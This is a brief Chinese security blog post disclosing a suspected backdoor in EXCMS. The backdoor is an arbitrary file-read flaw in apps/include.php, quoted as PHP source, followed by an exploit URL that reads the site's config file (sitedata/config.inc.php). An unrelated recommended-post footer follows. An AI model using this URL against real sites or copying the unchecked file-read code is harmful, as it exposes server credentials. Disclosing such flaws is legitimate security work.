EXCMS 疑似再暴后门

某天遇到Excms的系统，官网http://www.excms.cn/

于GG搜索excms漏洞，发现 http://www.myhack58.com/Article/html/3/62/2011/28871.htm

分析中是作者明显藏有后门的漏洞。

下载源码分析，很明显就能找到另一个疑似后门的漏洞（为什么说疑似？因为也不能确定，说不定就是有这样的程序员，呵呵。。）

漏洞文件：

apps/include.php

源码：

//加载系统配置文件
require_once('../configuration/inc/common.inc.php');

$file = $_GET['file'];
if($file!='' && file_exists(EXCMS_PATH.$file)){
        echo file_get_contents(EXCMS_PATH.$file);
}

不用看就知道了吧，呵呵。。。

利用：

http://www.xxxx.cn/apps/include.php?file=sitedata/config.inc.php

查看源码得：

文章来源于lcx.cc:EXCMS 疑似再暴后门

相关推荐: 【视频】网友调侃中石化天价酒单《我为祖国喝茅台》

网友调侃中石化天价酒单《我为祖国喝茅台》     【视频】网友调侃中石化天价酒单《我为祖国喝茅台》，我为祖国喝茅台，中石化，网友调侃。     不做评论，政府独裁、绝对垄断、极度腐败造就了中国的当前现状。 留言评论（旧系统）： 我叫罗玉凤！ @ 2011-04…